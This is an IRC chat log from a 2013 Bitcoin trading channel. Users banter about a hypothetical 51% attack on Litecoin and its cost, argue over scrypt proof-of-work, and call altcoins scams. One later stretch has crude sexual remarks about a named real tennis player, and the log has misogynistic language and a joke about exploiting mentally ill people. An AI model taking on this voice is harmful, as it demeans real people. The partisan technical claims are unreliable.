https://bitcointalk.org/index.php?topic=315182.0 lol Oct 21 03:04:55 <ozbot> i'd like to buy some Hashing power hashing for FTC Oct 21 03:05:16 <mircea_popescu> lol @best marketing phrase. what is it, litecoin makes your tits float ? Oct 21 03:05:19 <assbot> [HAVELOCK] [LABCO] 220 @ 0.00055445 = 0.122 BTC [+] {4} Oct 21 03:05:24 <pankkake> I'd like to start a 51% attack pool. the only goal is to destroy Oct 21 03:05:36 <pankkake> "silver to gold" Oct 21 03:06:10 <mircea_popescu> eh forget it. ltc is not to blame that it attracts idiots. Oct 21 03:06:14 <mircea_popescu> so does (did ?) btc. Oct 21 03:06:20 <assbot> [HAVELOCK] [AM1] 4 @ 0.76 = 3.04 BTC [-] Oct 21 03:06:54 <pankkake> my reservations are mostly technical Oct 21 03:07:01 <mircea_popescu> is there any hax in here to see ltc diff ? Oct 21 03:07:34 <mircea_popescu> pankkake Luke-Jr became famous through doing the same thing coupla years ago. or trying... i don't recall if he succeeded. Oct 21 03:08:05 <pankkake> by subverting his pool power so I heard Oct 21 03:08:13 <pankkake> but I wouldn't do that Oct 21 03:08:48 <pankkake> http://ltc.block-explorer.com/charts has nice stats Oct 21 03:08:49 <ozbot> Litecoin Charts - Litecoin Cryptocurrency Blockchain Explorer Oct 21 03:09:34 <mircea_popescu> difficulty 1k ?! are you fucking with me ? Oct 21 03:09:50 <mircea_popescu> so it'd cost me what, 0.1 btc/hour to maintain a 51% attack on ltc indefinitely ? Oct 21 03:09:53 <pankkake> it's scrypt, I guess values aren't comparable Oct 21 03:10:12 <mircea_popescu> orly. Oct 21 03:10:48 <pankkake> I tried to guess the cost, estimated litecoin's power to 38124 Radeon 7970 Oct 21 03:12:10 <mircea_popescu> what, nobody cared to make fpgas yet ?! Oct 21 03:13:44 <dexX7> mp, lurk more Oct 21 03:13:54 <pankkake> so that should be an investment of 17 155 800 USD is behind the network ($450 per card for counting the other components) Oct 21 03:14:14 <pankkake> and thus you need half of that to attack it Oct 21 03:14:25 <pankkake> or rent it, obviously Oct 21 03:15:06 <mircea_popescu> dexX7 i've not been paying much attention to ltc since prolly 2012 Oct 21 03:15:37 <mircea_popescu> anyway, the notion that 1k diff is worth 10mn in gear is ludicrous. Oct 21 03:15:59 <mircea_popescu> now i understand whty all the noob fury for pushing ltc : it allows them to live the illusion that their worthless gear is to be counted at 450 a board. Oct 21 03:16:29 <assbot> [HAVELOCK] [LABCO] 1302 @ 0.00077447 = 1.0084 BTC [+] {6} Oct 21 03:16:32 <mircea_popescu> ;;calc 17 * 300000 Oct 21 03:16:32 <nubbins`> what, you mean there isn't an insatiable demand for used gfx cards that have been melting themselves mining btc for the past few years? Oct 21 03:16:32 <gribble> 5100000 Oct 21 03:16:42 <nubbins`> it's almost like it's a solution in search of a problem Oct 21 03:16:43 <mircea_popescu> there, bitcoin mining gear is worth 5bn nao >D Oct 21 03:16:52 <VanCleef> mining is a scam Oct 21 03:16:57 <VanCleef> stop buying into it Oct 21 03:17:40 <Luke-Jr> pankkake: mircea_popescu is a troll; my pool was not involved Oct 21 03:17:44 <mircea_popescu> by the same rationale, a good pricing for the radeons would be 50 cents a piece. Oct 21 03:17:55 <pankkake> Luke-Jr: well the rumor is there! Oct 21 03:18:03 <mircea_popescu> Luke-Jr srsly ? Oct 21 03:18:43 <Luke-Jr> srsly. Oct 21 03:18:52 <pankkake> but if you create a pool to destroy altcoins I'd mine on it… if I actually had anything capable of :) Oct 21 03:18:52 <Luke-Jr> it was just lolnohashes Oct 21 03:19:19 <Luke-Jr> pankkake: waste of my time Oct 21 03:19:29 <Luke-Jr> pankkake: the hope with that one instance was that it'd deter the scammers Oct 21 03:19:35 <pankkake> well, some people just like to watch the world burn Oct 21 03:19:35 <mircea_popescu> hm. Oct 21 03:19:57 <mircea_popescu> well i guess more research is needed here. i can't readily point to proof. Oct 21 03:20:14 <MTBmanTT> I just dont understand the "push" with ltc- being a n00b to this world, ive never heard of it until the BTC forums. Oct 21 03:20:28 <Luke-Jr> MTBmanTT: it's a popular scam because it hasn't broken yet Oct 21 03:20:34 <mircea_popescu> MTBmanTT basically it makes sense on some level to have a reserve implementation. Oct 21 03:20:49 <Luke-Jr> mircea_popescu: there's no reserve implementation in litecoin, it's just a dumb clone Oct 21 03:20:57 <mircea_popescu> obviously idiots flock there just like they flock to btc. ltc has the disadvantage that it gets all the idiots that got broken uin btc, too Oct 21 03:20:59 <MTBmanTT> ah, I just figured it was there to make GPUs feel useful again, to in turn exchange for btc..... but that sounds more reasonable Oct 21 03:21:03 <Luke-Jr> if SHA256d breaks, it does too since it uses it for everything but the POW Oct 21 03:21:07 <mircea_popescu> goat being a fine example. Oct 21 03:21:18 <pankkake> mircea_popescu: yes, while I used to think that, litecoin isn't a different implementation Oct 21 03:21:29 <mircea_popescu> Luke-Jr depends how hardcore do yo uwant to get. one could say bitcoin isn't really a bitcoin either, just a dumb prototype. Oct 21 03:21:38 <mircea_popescu> the idea is it may be made to work if need be. Oct 21 03:21:47 <nubbins`> i thought btc was a prototype for mastercoin Oct 21 03:21:52 <nubbins`> *cough* Oct 21 03:21:56 <pankkake> :D Oct 21 03:22:32 <Luke-Jr> nubbins`: if you want to argue that, use freicoin as an example :p Oct 21 03:22:43 <Luke-Jr> they seem to be clueful Oct 21 03:22:56 <mircea_popescu> is that the demurage thing ? Oct 21 03:23:25 <Luke-Jr> yeah, and a bunch of other stuff Oct 21 03:23:56 <mircea_popescu> while it's a good idea to try it so it's trioed, im convinced demurage is a bad idea. Oct 21 03:24:08 <dexX7> mircea_popescu: i just wanted to exploit this rare situation of "lecturing you" :) scrypt is designed in a way that the bottleneck is rather the amount of fast accessible memory than computational speed and people say "litecoin is fpga/asic resistant" for that reason Oct 21 03:24:49 <mircea_popescu> dexX7 people say many things. meanwhile, 16gb boards aren't too expensive Oct 21 03:25:13 <Luke-Jr> mircea_popescu: yeah, I think inflation works better Oct 21 03:25:22 <mircea_popescu> inflation MIGHT work better. Oct 21 03:25:31 <Luke-Jr> dexX7: normal scrypt is; litecoin's variant is not Oct 21 03:25:50 <Luke-Jr> dexX7: and scrypt requires just as much memory to verify as to search, so it's not a proof-of-work Oct 21 03:25:52 <mircea_popescu> i have no idea. perhap a coin without the reward halving would win out on that score. Oct 21 03:26:10 <dexX7> ah okay, i'm not familiar with the underlying details Oct 21 03:26:27 <Luke-Jr> the BitShares guys came up with an actual memory-hard PoW algorithm, though I'm not convinced if it's solid or not yet Oct 21 03:28:07 <mircea_popescu> that the coindesk thing ? Oct 21 03:28:39 <pankkake> Yacoin (yes, Yet Another Altcoin) has a memory-intensive scrypt Oct 21 03:28:58 <asciilifeform> everybody knows that you can get FPGA+sdram socket boards for pocket change, right? Oct 21 03:29:00 <pankkake> and the memory requirements go up Oct 21 03:29:12 <mircea_popescu> asciilifeform apparently not. Oct 21 03:29:31 <Luke-Jr> pankkake: to verify as well Oct 21 03:29:57 <MTBmanTT> ok, this maybe really dumb and for that I'm sorry- but what is the point to all these other alt currencies? hopes that it becomes the next, or second bitcoin? Oct 21 03:29:58 <Luke-Jr> asciilifeform: the goal of memoryhard is that it the SDRAM would perform equally well with any host Oct 21 03:30:05 <mircea_popescu> Luke-Jr since you mention them, do you also know the drama re charles guy quitting invictus ? Oct 21 03:30:08 <Luke-Jr> MTBmanTT: to scam people into paying for them Oct 21 03:30:24 <Luke-Jr> MTBmanTT: convince a loser it's going to succeed, and that he'll make big bucks by buying early Oct 21 03:30:32 <mircea_popescu> MTBmanTT the inca cola example controls. they're there just in case you run out of coke somehow. Oct 21 03:30:41 <Luke-Jr> mircea_popescu: no, I didn't even hear of that Oct 21 03:30:46 <asciilifeform> Luke-Jr: sdram plus fpga which does nothing but sCrypt, vs. a general-purpose pc? Oct 21 03:31:05 <Luke-Jr> asciilifeform: well, I never said scrypt is a good algo :p Oct 21 03:31:13 <MTBmanTT> ty Oct 21 03:31:14 <mircea_popescu> all this delicious drama going to waste unknown. no wonder the alt coins aren't going anywhere. Oct 21 03:31:31 <Luke-Jr> asciilifeform: just that's the goal of a memoryhard algo Oct 21 03:31:43 <mircea_popescu> it's a fucking naive goal it's what it is. but anyway. Oct 21 03:31:51 <asciilifeform> 1st fellow to bake an altcoin that's actually interesting will win (something.) Oct 21 03:31:56 <mircea_popescu> memory is tghe cheapest thing you can do on silicon Oct 21 03:32:22 <MTBmanTT> +1 Oct 21 03:32:40 <asciilifeform> smart money's on 'slavecoin.' Oct 21 03:32:53 <mircea_popescu> <asciilifeform> 1st fellow to bake an altcoin that's actually interesting will win (something.) << he'll win my attention, for sure. Oct 21 03:33:02 <Luke-Jr> mircea_popescu: before SHA256d ASICs, it would have been a worthwhile goa.l Oct 21 03:33:04 <Luke-Jr> goal* Oct 21 03:33:26 <Luke-Jr> mircea_popescu: that's why Oct 21 03:33:33 <pankkake> mircea_popescu: did you look at ppcoin? Oct 21 03:33:35 <mircea_popescu> Luke-Jr yes, but only in the naive perspective. "oh, maybe things never happen". memory still was the cheapest use of silicon even before the sha256d was actually implemented. Oct 21 03:33:39 <asciilifeform> here's an idea: generalize the altcoin concept and bake a turing-complete workfunction spec right into the protocol. Oct 21 03:33:54 <mircea_popescu> asciilifeform go away haskelite. Oct 21 03:34:05 <Luke-Jr> pankkake: the altcoin that never accomplished decentralisation Oct 21 03:34:41 <asciilifeform> laughing? it would instantly let you convert, say, btc, into arbitrary parallel computations Oct 21 03:34:57 <pankkake> the checkpoints are a thing of the past, though I'd like some serious auditing of proof of stake Oct 21 03:35:26 <asciilifeform> say i want a certain hash bruted, and i say 'trade ya 100btc for 10000 hash-X-crack-coin.' Oct 21 03:35:42 <mircea_popescu> do you have any idea how hard this'd be to implement ? Oct 21 03:35:59 <asciilifeform> not really hard at all Oct 21 03:36:08 <nubbins`> lel Oct 21 03:36:25 <asciilifeform> just bake a Forth of sorts in there Oct 21 03:36:35 <asciilifeform> sorta how the original btc protocol wanted to Oct 21 03:36:41 <mircea_popescu> will the protocol support recursion in the workfunction ? Oct 21 03:37:04 <asciilifeform> sure, with a field for memory constraint, why not. Oct 21 03:37:13 <mircea_popescu> so can i implement a miner in the proof of work ? Oct 21 03:37:33 <asciilifeform> mircea_popescu: already fun! Oct 21 03:37:41 <asciilifeform> metacoin... Oct 21 03:37:44 <nubbins`> ha Oct 21 03:37:48 <asciilifeform> built-in mining future Oct 21 03:37:48 <mircea_popescu> and then if it forks what do you do ? Oct 21 03:38:00 <mircea_popescu> go back in time ? Oct 21 03:38:05 <nubbins`> call it non-deterministic Oct 21 03:38:09 <asciilifeform> mircea_popescu: that'd be just a special case of altcoin, no? Oct 21 03:38:10 <nubbins`> fuck quantum computing Oct 21 03:38:14 <mircea_popescu> km Oct 21 03:38:14 <nubbins`> coin computing is the future Oct 21 03:38:16 <mircea_popescu> lmao Oct 21 03:38:34 <nubbins`> imagine! Oct 21 03:38:36 <mircea_popescu> this was the most amusing instance of being trolled while i know im being trolled. Oct 21 03:38:39 <mircea_popescu> and he doesn't even have tits. Oct 21 03:38:41 <nubbins`> NP-HardCoin Oct 21 03:39:12 <asciilifeform> everybody loves nphard, but the rest of the complexityzoo needs love too Oct 21 03:39:13 <asciilifeform> https://complexityzoo.uwaterloo.ca/Complexity_Zoo Oct 21 03:39:14 <ozbot> Complexity Zoo Oct 21 03:43:57 <assbot> [HAVELOCK] [AM1] 2 @ 0.76 = 1.52 BTC [-] Oct 21 03:45:59 <assbot> [MPEX] [S.MPOE] 5243 @ 0.00088553 = 4.6428 BTC [-] Oct 21 03:47:00 <assbot> [MPEX] [S.MPOE] 6557 @ 0.00088112 = 5.7775 BTC [-] {2} Oct 21 03:47:31 <mircea_popescu> Luke-Jr fwiw, this was pretty lulzy http://archive.is/61czq Oct 21 03:53:57 <MTBmanTT> Has anyone here used CEX? I know there is alot of back n fourth about them, but honestly ive been doing ok- almost have a whole btc, def. beats faucet crap Oct 21 03:54:09 <MTBmanTT> then again, Iam sure most of you have some actual money to work with in btc world :P Oct 21 03:54:24 <mircea_popescu> yes, this chan is for ppl doing 1k+ Oct 21 03:54:58 <MTBmanTT> noted Oct 21 03:57:47 <dexX7> what's the connection of cex and faucets? Oct 21 03:57:55 <MTBmanTT> On Mpex exchange, is that for 1K and above as well? Oct 21 03:58:28 <MTBmanTT> @dex, nothing really I am just a broke kid trying to earn a little is all...was wondering if I am just spinning my tires on something like CEX Oct 21 03:58:33 <mircea_popescu> anyway, so upon research the entire "luke-jr attacked litecoin" thing boils down to, back in april luke had no idea i had put the kaibosh on mtgox at the secret march meeting. thus he got all excited upon hearing mtgox intends to go die into altcoin heaven, and started a campaign of wiki editing and trolling the ltc dev chan. he didn't actually 51% ltc or anything. Oct 21 03:58:45 <mircea_popescu> MTBmanTT nah, you only pay 30 btc to get a seat. Oct 21 03:59:07 <MTBmanTT> lol ooook, ill be waiting outside if thats the case Oct 21 03:59:37 <mircea_popescu> you can prolly use a broker till then. Oct 21 03:59:50 <kakobrekla> no he couldnt have done much to ltc, he has sha256 pool not scrypt, not compatible Oct 21 03:59:50 <Luke-Jr> mircea_popescu: lol, troll Oct 21 04:00:17 <mircea_popescu> Luke-Jr which part ? Oct 21 04:00:25 <mircea_popescu> kakobrekla https://bitcointalk.org/index.php?topic=191679.msg2137984#msg2137984 apparently kano (still) doesn't like him. Oct 21 04:01:11 <Luke-Jr> of course he doesn't, he never did Oct 21 04:01:13 <Luke-Jr> he's a troll like you Oct 21 04:01:16 <Luke-Jr> and trolls tend to hate me Oct 21 04:01:23 <pankkake> everyone's a troll! Oct 21 04:01:23 <kakobrekla> im not sure who does, mp. Oct 21 04:03:33 <nubbins`> everyone is a troll except you Oct 21 04:03:39 <nubbins`> ^ now there's a t-shirt idea Oct 21 04:03:46 <mircea_popescu> lol Oct 21 04:03:53 <mircea_popescu> i wonder if kano actually thinks he's like me. Oct 21 04:08:52 <mircea_popescu> kakobrekla lmao at XVII + nineteen = on the bash site. Oct 21 04:08:57 <mircea_popescu> this will become a fucking meme. Oct 21 04:09:25 <kakobrekla> hehe Oct 21 04:10:14 <mircea_popescu> ;;google jesus is a troll Oct 21 04:10:15 <gribble> troll jesus on Tumblr: <http://www.tumblr.com/tagged/troll-jesus>; Jesus is a Jerk | Know Your Meme: <http://knowyourmeme.com/memes/jesus-is-a-jerk>; Troll Jesus | Facebook: <https://www.facebook.com/pages/Troll-Jesus/112914982053779> Oct 21 04:11:24 <nubbins`> http://imgur.com/MzrE2nc Oct 21 04:11:24 <ozbot> imgur: the simple image sharer Oct 21 04:12:00 <mircea_popescu> http://i.imgur.com/sX2AVO3.png Oct 21 04:12:41 <mircea_popescu> actually, much better, http://i.imgur.com/jEXJi13.gif Oct 21 04:13:12 <nubbins`> !! Oct 21 04:13:21 <nubbins`> now that's ankle strength Oct 21 04:13:48 <MTBmanTT> I waiting for a faceplant wont lie Oct 21 04:13:52 <mircea_popescu> girl that learned to high heel properly. Oct 21 04:14:15 <kakobrekla> speaking of bash Oct 21 04:14:23 <kakobrekla> this seems to be most disliked comment http://bash.bitcoin-assets.com/?quote=7 Oct 21 04:14:33 <kakobrekla> do we have lots of labcoin 'investor' readers? Oct 21 04:14:53 <mircea_popescu> btw, shouldn't you be approving some more ? Oct 21 04:14:58 <kakobrekla> i just did Oct 21 04:15:32 <kakobrekla> im still thinking about the anal prolapse one. Oct 21 04:15:39 <KRS1> "rosebud" Oct 21 04:15:48 <mircea_popescu> the worst part about being a bash mod Oct 21 04:15:55 <mircea_popescu> you get to spend a lot of time pondering anal prolapse. Oct 21 04:16:29 <kakobrekla> ill sleep on it. Oct 21 04:16:35 <mircea_popescu> don't fall in. Oct 21 04:16:40 <kakobrekla> hehe Oct 21 04:17:23 <mircea_popescu> also i just negged the labcoin bash because it's banal and unfunny Oct 21 04:17:55 <VanCleef> shut up, labcoin is going to recover damn it Oct 21 04:18:02 <nubbins`> can't get a home run with every swing, ya know Oct 21 04:18:09 <VanCleef> sam said so Oct 21 04:21:34 <mircea_popescu> nubbins` depends if you swing in the lake of cunt. Oct 21 04:22:47 <nubbins`> http://www.seanbaby.com/cleveland/images/bumper1.gif Oct 21 04:23:12 <nubbins`> not sure if relevant or if i've taken too many allergy pills Oct 21 04:24:26 <turbo_ac100_> lol Oct 21 04:28:42 <assbot> [MPEX] [S.MPOE] 8581 @ 0.00088531 = 7.5968 BTC [+] {2} **** BEGIN LOGGING AT Mon Oct 21 08:55:43 2013 Oct 21 08:56:33 <Vexual> hey bella Oct 21 08:57:27 <Vexual> http://www.youtube.com/watch?v=RgInoVbM77E Oct 21 08:57:28 <ozbot> N.W.A. - Straight Outta Compton (EXPLICIT VERSION) - YouTube Oct 21 09:07:25 <mircea_popescu> http://www.strangedangers.com/images/content/151535.jpg Oct 21 09:08:45 <Vexual> tennis money Oct 21 09:11:26 <Vexual> powerful glutes Oct 21 09:13:17 <Vexual> have you seen her play mircea? Oct 21 09:13:34 <mircea_popescu> when she was real young Oct 21 09:13:43 <Vexual> where? Oct 21 09:13:48 <mircea_popescu> in constanta Oct 21 09:14:05 <Vexual> does she play wimbledon now? Oct 21 09:14:37 <Vexual> coz thats some champagne and strawberry scenery Oct 21 09:14:54 <mircea_popescu> she might win the next one. Oct 21 09:15:18 <Vexual> is she into dick? Oct 21 09:16:41 <mircea_popescu> to some extent i suppose Oct 21 09:17:13 <Vexual> itd be a pity if she was alergic Oct 21 09:17:44 <mircea_popescu> she's a 20ish yo tennis player on the upstroke. Oct 21 09:17:56 <mircea_popescu> she probably gets laid about as much as the average computer geek does. Oct 21 09:18:22 <Vexual> well if it wasnt vigourous, im sure her trainer would say it was a waste of time Oct 21 09:19:54 <mircea_popescu> funny thing is, serena williams is prolly her personal nemesis Oct 21 09:20:08 <mircea_popescu> wiped her in the finals twice i think. or mebbe three times Oct 21 09:20:45 <Vexual> ive got to get a tv Oct 21 09:21:04 <mircea_popescu> course serena is like what, 32 ? Oct 21 09:21:13 <Vexual> no idea Oct 21 09:21:14 <mircea_popescu> in five years she'll wipe her right back fo sho Oct 21 09:21:38 <Vexual> she looks very fit Oct 21 09:22:33 <Vexual> is her tennis game good? excitting as her body? Oct 21 09:23:16 <mircea_popescu> she just won the kremlin cup Oct 21 09:23:34 <Vexual> whats her prize money total? Oct 21 09:24:13 <mircea_popescu> milionish Oct 21 09:24:28 <Vexual> more importantly, whens she in a grand slam? Oct 21 09:24:52 <Vexual> im gonna get a case of gin and put a big bet on for her win Oct 21 09:25:03 <mircea_popescu> prolly this year. Oct 21 09:25:22 <Vexual> whats her name? Oct 21 09:27:40 <mircea_popescu> simona halep Oct 21 09:28:20 <mircea_popescu> you're probably going to get great ods, as she was wiped this year in au open, rg, wimbledon and us open. she goes like 1st 1st 2nd 4th Oct 21 09:29:25 <Vexual> well with the gin ana d the tv, i cant really lose Oct 21 09:30:19 <Vexual> watching her win at wimbledon from ther stands would be better Oct 21 09:32:54 <Vexual> http://www.dailymotion.com/video/x1hu2g_snoop-dogg-sign_music Oct 21 09:32:55 <ozbot> Snoop Dogg : Sign - Video Dailymotion Oct 21 09:37:44 <assbot> [MPEX] [S.MPOE] 3550 @ 0.00088165 = 3.1299 BTC [-] {2} Oct 21 09:39:23 <Vexual> especially with a grand on at 50 to 1 Oct 21 09:44:05 <Vexual> http://upload.wikimedia.org/wikipedia/commons/thumb/7/70/Hopfen1.jpg/800px-Hopfen1.jpg Oct 21 09:47:54 <assbot> [HAVELOCK] [AM1] 4 @ 0.76 = 3.04 BTC [-] Oct 21 10:03:09 <assbot> [MPEX] [S.MPOE] 1994 @ 0.00088543 = 1.7655 BTC [+] Oct 21 10:06:12 <assbot> [HAVELOCK] [NEOBEE] 10614 @ 0.00230278 = 24.4417 BTC [-] {7} Oct 21 10:09:15 <assbot> [HAVELOCK] [AM100] 80 @ 0.00748 = 0.5984 BTC [+] Oct 21 10:19:25 <assbot> [HAVELOCK] [AM100] 300 @ 0.00748 = 2.244 BTC [+] Oct 21 10:23:29 <assbot> [HAVELOCK] [AM100] 60 @ 0.00748 = 0.4488 BTC [+] Oct 21 10:30:56 <Vexual> ahh london in the summer Oct 21 10:31:38 <assbot> [HAVELOCK] [AM1] 5 @ 0.76 = 3.8 BTC [-] Oct 21 10:32:30 <Vexual> you can keep zurich and frankfurt Oct 21 10:32:38 <Vexual> new york Oct 21 10:36:43 <assbot> [HAVELOCK] [VTX] 1 @ 0.40979999 BTC [+] Oct 21 10:38:45 <assbot> [HAVELOCK] [AM100] 545 @ 0.00748 = 4.0766 BTC [+] {3} Oct 21 10:40:48 <Vexual> it goes london, mumbai, sydney Oct 21 10:42:12 <Vexual> id put san fran in there for satoshi, but bitcoin has no hoome Oct 21 10:43:13 <kakobrekla> who is it that you are talking to? Oct 21 10:43:41 <Vexual> mainly me, but i know youre listening kako Oct 21 10:43:46 <kakobrekla> :) Oct 21 10:43:53 <Vexual> and i can see the logs Oct 21 10:44:09 <Vexual> http://www.youtube.com/watch?v=TecR_5-rQ4U Oct 21 10:44:10 <ozbot> Dirty Cash(Money Talks) - YouTube Oct 21 10:45:19 <Vexual> if you're running out of hard drive, feel free to kick me to save on log space Oct 21 10:45:36 <kakobrekla> hd space is practically free these days Oct 21 10:46:33 <Vexual> ive got to replace my 40 gb system drive for the blockchain now Oct 21 10:47:07 <Vexual> im not sure if i buy a 256 ssd or 2tb hdd Oct 21 10:47:28 <Vexual> i think disc Oct 21 10:50:55 <kakobrekla> are you from 99? Oct 21 10:52:51 <VanCleef> is it possible to sue satoshi for coming up with the bitcoin mining scam? Oct 21 10:53:02 <Vexual> no Oct 21 10:53:08 <kakobrekla> are you from another planet? Oct 21 10:53:23 <Vexual> m or slovakistan? Oct 21 10:53:38 <kakobrekla> m? Oct 21 10:53:44 <Vexual> *me Oct 21 10:53:55 <kakobrekla> vancleef Oct 21 10:53:59 <Vexual> i missed the e, i type so fast Oct 21 10:54:27 <Vexual> and my found dell keyboard is encrusded with spilled cocktails Oct 21 10:54:34 <VanCleef> SEC wants to charge satoshi for the bitcoin mining scam Oct 21 10:54:39 <Vexual> sad but true Oct 21 10:55:09 <Vexual> satoshi gets stopped at airports, but doesn no crimes Oct 21 10:55:23 <VanCleef> we will get him, dont worry Oct 21 10:55:31 <Vexual> didnt even spend the old money ever Oct 21 10:57:16 <Vexual> sec's continued relevance can be measured in months Oct 21 10:58:55 <Vexual> gotta get me a honeywell Oct 21 10:59:10 <Vexual> black is s atupid colour for a kb Oct 21 10:59:24 <VanCleef> i need me some dot matrix action Oct 21 11:00:16 <Vexual> snes? Oct 21 11:01:54 <Vexual> dutch are you saying get solid state with the 99 gybe? Oct 21 11:02:07 <assbot> [HAVELOCK] [VTX] 1 @ 0.4098 BTC [+] Oct 21 11:03:08 <assbot> [HAVELOCK] [AM1] 2 @ 0.76 = 1.52 BTC [-] Oct 21 11:09:33 <Vexual> ok, ssd Oct 21 11:09:53 <Vexual> after all Oct 21 11:13:07 <Vexual> foor old 40 samsung, hot but no failures ever Oct 21 11:13:56 <Vexual> no bad secor in 7 years Oct 21 11:16:42 <Vexual> i meant seagate Oct 21 11:17:22 <assbot> [HAVELOCK] [AM1] 3 @ 0.76 = 2.28 BTC [-] Oct 21 11:20:22 <Vexual> how old is friedcat? Oct 21 11:23:57 <Vexual> i would gess he was gorn in the eighties Oct 21 11:24:30 <assbot> [MPEX] [S.MPOE] 6836 @ 0.00088543 = 6.0528 BTC [+] Oct 21 11:28:47 <Vexual> http://www.youtube.com/watch?v=ZTQSBm5A_FI Oct 21 11:28:47 <ozbot> Black Lagoon - Revy's Sound Advise - YouTube Oct 21 11:32:51 <Vexual> http://www.youtube.com/watch?v=L-Ui5Suk7q0 Oct 21 11:32:51 <ozbot> Balalaika's Bad Day - YouTube Oct 21 11:39:46 <Vexual> cmon kako, put me on the bash, you know its clever Oct 21 11:42:23 <Vexual> half that shits about litecoin Oct 21 11:48:54 <assbot> [HAVELOCK] [VTX] 5 @ 0.4098 = 2.049 BTC [+] Oct 21 11:51:04 <dub> http://www.youtube.com/watch?v=QOfyHjRONLo Oct 21 11:51:05 <ozbot> Waltzing Matilda (Australia Day 2009 Live) - YouTube Oct 21 11:51:32 <Vexual> http://www.youtube.com/watch?v=_zR6ROjoOX0 Oct 21 11:51:32 <ozbot> Iggy Azalea - Work (Explicit) - YouTube Oct 21 11:51:35 <Vexual> sup dub Oct 21 11:51:57 <assbot> [HAVELOCK] [NEOBEE] 998 @ 0.002709 = 2.7036 BTC [+] Oct 21 11:54:09 <dub> http://www.youtube.com/watch?v=wFDOLc7WosA Oct 21 11:54:09 <ozbot> Waltzing Matilda - YouTube Oct 21 11:55:35 <Vexual> http://www.youtube.com/watch?v=ML9h3I5Uktw Oct 21 11:55:35 <ozbot> GANGgajang - Sounds Of Then (This Is Australia) - YouTube Oct 21 11:57:11 <dub> http://www.youtube.com/watch?v=eXlBN_mAwLE Oct 21 11:57:11 <ozbot> Kylie Minogue - Waltzing Matilda (2000) - YouTube Oct 21 11:59:54 <Vexual> as tastry a strumpet kylie is, i give you this Oct 21 12:00:03 <Vexual> http://www.dailymotion.com/video/x102uc_men-at-work-land-down-under_music Oct 21 12:00:04 <ozbot> Men At Work-Land Down Under - Video Dailymotion Oct 21 12:03:46 <Vexual> http://www.youtube.com/watch?v=onE43h_TUUY Oct 21 12:03:46 <ozbot> Dirty Deeds Done Dirt Cheap by AC/DC (with lyrics) - YouTube Oct 21 12:14:20 <assbot> [HAVELOCK] [CFIG] 1 @ 0.1216 BTC [-] Oct 21 12:18:03 <Vexual> http://www.youtube.com/watch?v=H-oeDqdgIU4 Oct 21 12:18:04 <ozbot> ACDC - Highway To Hell with lyrics - YouTube Oct 21 12:53:59 <assbot> [HAVELOCK] [AM1] 3 @ 0.76 = 2.28 BTC [-] Oct 21 13:36:41 <assbot> [HAVELOCK] [CFIG] 2 @ 0.132705 = 0.2654 BTC [+] {2} Oct 21 13:40:45 <assbot> [HAVELOCK] [CBTC] 688 @ 0.00017005 = 0.117 BTC [-] {3} Oct 21 13:48:53 <assbot> [HAVELOCK] [AM100] 15 @ 0.00745 = 0.1118 BTC [-] Oct 21 14:19:23 <assbot> [HAVELOCK] [AM1] 3 @ 0.76 = 2.28 BTC [-] Oct 21 14:35:00 <pankkake> Labcoin shareholder: "I'm really disappointed、angry、despair、depress." Oct 21 14:35:29 <Vexual> tell it to thge swede Oct 21 14:35:47 <kleeck> what a drama queen. Oct 21 14:36:16 <KRS1> Ah Poor investor. Oct 21 14:37:41 <assbot> [HAVELOCK] [NEOBEE] 1300 @ 0.00222849 = 2.897 BTC [-] {7} Oct 21 14:40:35 <Vexual> if you gave money to a mentally ill person tho buy an icecream and they failed in the endeavour would you be surprised Oct 21 14:42:27 <jurov> ;;bids 0.1 Oct 21 14:42:29 <gribble> There are currently 438217.22 bitcoins demanded at or over 0.1 USD, worth 15860381.9766 USD in total. | Data vintage: 0.0094 seconds Oct 21 14:42:57 <jurov> ;;asks 200 Oct 21 14:42:57 <gribble> There are currently 6145.4144 bitcoins offered at or under 200.0 USD, worth 1214062.07692 USD in total. | Data vintage: 28.4765 seconds Oct 21 14:43:15 <kleeck> .d Oct 21 14:43:15 <ozbot> 267731249.48242 | Next Diff in 1052 blocks | Estimated Change: 34.6435% in 4d 18h 26m 40s Oct 21 14:44:15 <jurov> ;;asks 1000 Oct 21 14:44:15 <gribble> There are currently 24241.38 bitcoins offered at or under 1000.0 USD, worth 6378279.99773 USD in total. | Data vintage: 105.9737 seconds Oct 21 14:44:47 <KRS1> heh vexual Oct 21 14:48:39 <kleeck> I take mentally ill people's money on the reg. Oct 21 14:50:10 <_Neil> Litecoin collapsed below 0.01 BTC Oct 21 14:50:55 <assbot> [MPEX] [S.MPOE] 13570 @ 0.00088444 = 12.0019 BTC [-] {3} Oct 21 14:54:06 <KRS1> saw that coming Oct 21 15:00:04 <assbot> [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 21 15:13:17 <assbot> [MPEX] [S.MPOE] 2344 @ 0.00088198 = 2.0674 BTC [-] Oct 21 15:27:28 <pankkake> well it did already a few times on mcxNOW Oct 21 15:28:15 <pankkake> RIP litecoin Oct 21 15:29:26 <Vexual> 2 blockchains are neccessary Oct 21 15:30:00 <pankkake> 1) why? 2) why litecoin's? Oct 21 15:30:14 <Apocalyptic> pankkake, wonder where our friend skinnkavaj is Oct 21 15:30:17 <pankkake> I guess if you want to experiment you can have a merge mined coin, it is much safer Oct 21 15:30:21 <Apocalyptic> oh, he's there Oct 21 15:30:34 <skinnkavaj> I am right here Oct 21 15:30:37 <skinnkavaj> buying cheap LTC Oct 21 15:30:45 <pankkake> Apocalyptic: well, I doubt he said it wouldn't go under; his idea is that it will go up later Oct 21 15:30:55 <skinnkavaj> I really hope Oct 21 15:30:57 <skinnkavaj> it goes down more Oct 21 15:31:02 <skinnkavaj> So i can buy even more Oct 21 15:31:13 <skinnkavaj> Looking for 0.007 levels Oct 21 15:31:16 <pankkake> why not wait for the bottom? Oct 21 15:31:23 <skinnkavaj> There is no way to tell the bottom Oct 21 15:31:26 <skinnkavaj> But best guess 0.0007 Oct 21 15:31:31 <skinnkavaj> Then i go all in Oct 21 15:31:34 <pankkake> I mean, if I ever wanted to buy an altcoin falling that I did believe in, that's what I would do Oct 21 15:31:34 <Apocalyptic> pankkake, cause he is irrational Oct 21 15:31:34 <assbot> [HAVELOCK] [AM1] 10 @ 0.73 = 7.3 BTC [-] Oct 21 15:32:01 <pankkake> I don't see a reason to buy right now, I'll just wait and watch the prices Oct 21 15:32:25 <pankkake> with bitcoins I don't like to wait because I don't trust my fiat in exchanges, but with altcoins it's fast Oct 21 15:32:35 <assbot> [HAVELOCK] [AM100] 20 @ 0.0074475 = 